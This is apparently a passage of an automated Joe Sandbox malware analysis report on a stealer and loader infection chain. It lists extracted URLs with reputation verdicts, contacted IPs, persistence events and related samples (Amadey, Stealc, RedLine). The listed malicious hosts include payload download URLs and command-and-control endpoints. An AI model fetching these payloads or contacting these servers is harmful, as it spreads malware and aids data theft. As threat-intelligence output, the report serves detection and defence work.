                                  http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.innosetup.com/stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.ip.sb/ippenis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protectionneedmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.16/inc/rstxdhuj.exez&axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinestories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.ver)svchost.exe, 0000001A.00000002.3344988955.0000019DEAC00000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHDstealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.ecosia.org/newtab/hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.17/2fb6c2cc8dce150a.php3stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://tempuri.org/Entity/Id21ResponseDRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.17/2fb6c2cc8dce150a.php4stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJastealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.26/6122658-3693405117-2476756634-1003Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLstealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refstealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.103/mine/random.exeaxplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://194.116.215.195/12dsvc.exeaxplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://tempuri.org/Entity/Id10ResponseDRegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://176.113.115.95/thebig/stories.exeHkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id15ResponseDRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.26/Dem7kTu/index.phphHkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id8ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.sectigo.com0needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://185.215.113.26/Dem7kTu/index.phpsHkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUstories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYistealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2006/02/addressingidentityRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.26/Dem7kTu/index.phpyHkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.ip.spenis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.17/2fb6c2cc8dce150a.phpfstealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/DRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.17/2fb6c2cc8dce150a.phppstealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.26/Dem7kTu/index.phpKHkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  91.202.233.158
                                  unknownRussian Federation
                                  9009M247GBtrue
                                  194.116.215.195
                                  unknownunknown
                                  44676VMAGE-ASRUfalse
                                  185.215.113.26
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLtrue
                                  185.215.113.67
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLtrue
                                  142.250.186.174
                                  google.comUnited States
                                  15169GOOGLEUSfalse
                                  104.21.2.13
                                  ballotnwu.siteUnited States
                                  13335CLOUDFLARENETUStrue
                                  185.215.113.16
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLtrue
                                  185.215.113.17
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLtrue
                                  95.179.250.45
                                  unknownNetherlands
                                  20473AS-CHOOPAUStrue
                                  172.67.208.139
                                  reinforcenh.shopUnited States
                                  13335CLOUDFLARENETUStrue
                                  104.21.4.136
                                  gutterydhowi.shopUnited States
                                  13335CLOUDFLARENETUStrue
                                  172.67.162.108
                                  drawzhotdog.shopUnited States
                                  13335CLOUDFLARENETUStrue
                                  188.114.97.3
                                  fragnantbui.shopEuropean Union
                                  13335CLOUDFLARENETUStrue
                                  65.21.18.51
                                  unknownUnited States
                                  199592CP-ASDEtrue
                                  188.114.96.3
                                  offensivedzvju.shopEuropean Union
                                  13335CLOUDFLARENETUStrue
                                  176.113.115.95
                                  unknownRussian Federation
                                  49505SELECTELRUfalse
                                  89.105.223.196
                                  unknownNetherlands
                                  21159NOVOSERVE-GMBH-ASFrankfurtGermanyNLtrue
                                  104.102.49.254
                                  steamcommunity.comUnited States
                                  16625AKAMAI-ASUSfalse
                                  185.215.113.117
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLfalse
                                  185.215.113.103
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLfalse
                                  IP
                                  127.0.0.1
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1520057
                                  Start date and time:2024-09-27 04:19:08 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 13m 15s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:45
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@73/109@19/21
                                  EGA Information:
                                  • Successful, ratio: 72.7%
                                  HCA Information:
                                  • Successful, ratio: 59%
                                  • Number of executed functions: 250
                                  • Number of non-executed functions: 145
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 142.250.186.131, 142.250.184.238, 173.194.76.84, 216.58.206.67, 142.250.186.67, 142.250.185.202, 142.250.186.74, 142.250.184.234, 142.250.184.202, 172.217.18.10, 142.250.186.106, 142.250.185.234, 172.217.16.202, 142.250.181.234, 216.58.206.42, 216.58.212.170, 142.250.186.170, 172.217.16.138, 142.250.186.138, 216.58.206.74, 142.250.186.42, 216.58.212.138, 172.217.23.106, 142.250.185.106, 142.250.185.74, 142.250.185.170, 172.217.18.106, 142.250.185.138
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, optimizationguide-pa.googleapis.com
                                  • Execution Graph export aborted for target axplong.exe, PID 4564 because there are no executed function
                                  • Execution Graph export aborted for target axplong.exe, PID 4720 because there are no executed function
                                  • Execution Graph export aborted for target file.exe, PID 5588 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size exceeded maximum capacity and may have missing network information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  TimeTypeDescription
                                  04:20:02Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                  04:21:12Task SchedulerRun new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                  04:21:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe
                                  04:21:44Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  04:21:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exe C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe
                                  04:21:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exe C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe
                                  04:22:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5140a3dea9.exe C:\Users\user\AppData\Local\Temp\1000023001\5140a3dea9.exe
                                  04:22:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4f60833b22.exe C:\Users\user\1000026002\4f60833b22.exe
                                  22:21:01API Interceptor3809x Sleep call for process: axplong.exe modified
                                  22:21:12API Interceptor438x Sleep call for process: Hkbsse.exe modified
                                  22:21:17API Interceptor42x Sleep call for process: RegAsm.exe modified
                                  22:21:18API Interceptor46x Sleep call for process: hjhTHr6fWy.exe modified
                                  22:21:22API Interceptor2x Sleep call for process: svchost.exe modified
                                  22:21:28API Interceptor43x Sleep call for process: svchost015.exe modified
                                  22:21:43API Interceptor34x Sleep call for process: newbundle2.exe modified
                                  22:21:55API Interceptor6x Sleep call for process: fidovideorecorder32_64.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  91.202.233.158file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  file.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  SecuriteInfo.com.Win32.MalwareX-gen.167.30598.exeGet hashmaliciousCryptOne, StealcBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  XpCyBwDzEt.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLineBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  file.exeGet hashmaliciousLummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                  • 91.202.233.158/e96ea2db21fa9a1b.php
                                  e0OOofAl0S.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
